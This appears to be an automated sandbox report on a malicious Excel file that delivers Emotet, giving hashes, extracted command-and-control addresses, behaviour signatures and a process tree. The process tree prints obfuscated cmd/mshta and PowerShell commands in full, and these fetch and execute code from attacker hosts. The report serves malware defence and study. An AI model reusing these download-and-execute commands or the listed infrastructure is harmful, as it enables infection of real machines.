Analysis
-
max time kernel
135s -
max time network
166s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19-01-2022 15:13
Behavioral task
behavioral1
Sample
4b1800da594032e6944a2b0728eaa50223d1ca0a6eaf3883ce9a0dc05d2e982a.xls
Resource
win10-en-20211208
General
-
Target
4b1800da594032e6944a2b0728eaa50223d1ca0a6eaf3883ce9a0dc05d2e982a.xls
-
Size
141KB
-
MD5
110d7ef2b3b5009e6387a7becdc65ad6
-
SHA1
151e3cb88ac922df8d742b4df8a49e7488d82a99
-
SHA256
4b1800da594032e6944a2b0728eaa50223d1ca0a6eaf3883ce9a0dc05d2e982a
-
SHA512
58b0ef00ea8341cc06b3389c8504ea68844f6579b55c93b97dd09ca120ba26e3c2812cf8d21996828173d832b7a38b55c607318df7c10d094435c003077866a4
Malware Config
Extracted
http://0xb907d607/fer/fer.html
Extracted
http://185.7.214.7/fer/fer.png
Extracted
emotet
Epoch4
131.100.24.231:80
209.59.138.75:7080
103.8.26.103:8080
51.38.71.0:443
212.237.17.99:8080
79.172.212.216:8080
207.38.84.195:8080
104.168.155.129:8080
178.79.147.66:8080
46.55.222.11:443
103.8.26.102:8080
192.254.71.210:443
45.176.232.124:443
203.114.109.124:443
51.68.175.8:8080
58.227.42.236:80
45.142.114.231:8080
217.182.143.207:443
178.63.25.185:443
45.118.115.99:8080
103.75.201.2:443
104.251.214.46:8080
158.69.222.101:443
81.0.236.90:443
45.118.135.203:7080
176.104.106.96:8080
212.237.56.116:7080
216.158.226.206:443
173.212.193.249:8080
50.116.54.215:443
138.185.72.26:8080
41.76.108.46:8080
212.237.5.209:443
107.182.225.142:8080
195.154.133.20:443
162.214.50.39:7080
110.232.117.186:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 688 3192 cmd.exe EXCEL.EXE -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 31 368 mshta.exe 39 1716 powershell.exe 41 1716 powershell.exe 43 1716 powershell.exe 55 376 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 1404 rundll32.exe 3196 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Erzaamynywtbbnz\tkdknshaqnhjmpr.djp rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2044 368 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3192 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 1716 powershell.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 2044 WerFault.exe 1716 powershell.exe 1716 powershell.exe 376 rundll32.exe 376 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1716 powershell.exe Token: SeDebugPrivilege 2044 WerFault.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE 3192 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 3192 wrote to memory of 3220 3192 EXCEL.EXE splwow64.exe PID 3192 wrote to memory of 3220 3192 EXCEL.EXE splwow64.exe PID 3192 wrote to memory of 688 3192 EXCEL.EXE cmd.exe PID 3192 wrote to memory of 688 3192 EXCEL.EXE cmd.exe PID 688 wrote to memory of 368 688 cmd.exe mshta.exe PID 688 wrote to memory of 368 688 cmd.exe mshta.exe PID 368 wrote to memory of 1716 368 mshta.exe powershell.exe PID 368 wrote to memory of 1716 368 mshta.exe powershell.exe PID 1716 wrote to memory of 828 1716 powershell.exe cmd.exe PID 1716 wrote to memory of 828 1716 powershell.exe cmd.exe PID 828 wrote to memory of 1404 828 cmd.exe rundll32.exe PID 828 wrote to memory of 1404 828 cmd.exe rundll32.exe PID 828 wrote to memory of 1404 828 cmd.exe rundll32.exe PID 1404 wrote to memory of 3196 1404 rundll32.exe rundll32.exe PID 1404 wrote to memory of 3196 1404 rundll32.exe rundll32.exe PID 1404 wrote to memory of 3196 1404 rundll32.exe rundll32.exe PID 3196 wrote to memory of 1788 3196 rundll32.exe rundll32.exe PID 3196 wrote to memory of 1788 3196 rundll32.exe rundll32.exe PID 3196 wrote to memory of 1788 3196 rundll32.exe rundll32.exe PID 1788 wrote to memory of 376 1788 rundll32.exe rundll32.exe PID 1788 wrote to memory of 376 1788 rundll32.exe rundll32.exe PID 1788 wrote to memory of 376 1788 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4b1800da594032e6944a2b0728eaa50223d1ca0a6eaf3883ce9a0dc05d2e982a.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3220
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fer.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Erzaamynywtbbnz\tkdknshaqnhjmpr.djp",kIkmMPeq8⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Erzaamynywtbbnz\tkdknshaqnhjmpr.djp",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:376 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 368 -s 16884⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
7803ec85f87ba4a0683937445909605d
SHA1c65731c5b8628b8bb741beb11a3eb7a92a15592d
SHA2569c407b96d2e88fbafc70623d94591164063608d2d8e199caa6d2cbabfccea542
SHA51262a6ba974e0c1d7de1f1542bbaecf23228b0ccf642ed120e7ebcab81f91d04083fa51259e44cdeaa819aa81332ada43eb28a66cbebd4321f112f2df353fb92fe
-
MD5
7803ec85f87ba4a0683937445909605d
SHA1c65731c5b8628b8bb741beb11a3eb7a92a15592d
SHA2569c407b96d2e88fbafc70623d94591164063608d2d8e199caa6d2cbabfccea542
SHA51262a6ba974e0c1d7de1f1542bbaecf23228b0ccf642ed120e7ebcab81f91d04083fa51259e44cdeaa819aa81332ada43eb28a66cbebd4321f112f2df353fb92fe
-
MD5
7803ec85f87ba4a0683937445909605d
SHA1c65731c5b8628b8bb741beb11a3eb7a92a15592d
SHA2569c407b96d2e88fbafc70623d94591164063608d2d8e199caa6d2cbabfccea542
SHA51262a6ba974e0c1d7de1f1542bbaecf23228b0ccf642ed120e7ebcab81f91d04083fa51259e44cdeaa819aa81332ada43eb28a66cbebd4321f112f2df353fb92fe